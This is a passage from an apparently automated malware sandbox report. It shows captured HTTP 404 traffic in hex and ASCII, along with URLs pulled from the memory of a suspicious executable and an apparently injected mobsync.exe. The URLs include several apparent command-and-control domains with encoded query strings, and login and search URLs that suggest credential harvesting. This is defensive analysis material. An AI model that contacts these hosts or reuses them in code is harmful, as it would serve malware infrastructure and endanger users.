6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:31 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:34 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:37 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:40 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000005986000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000039E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a
                Source: zZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website
                Source: zZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website/gn26/
                Source: mobsync.exe, 00000003.00000002.3505219170.0000000007B30000.00000004.00000800.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003D0A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/g3h7/?rfJh=dyqW
                Source: zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003B78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000005E3C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003E9C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000006160000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000041C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfh
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000003.00000003.2048749445.0000000007DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
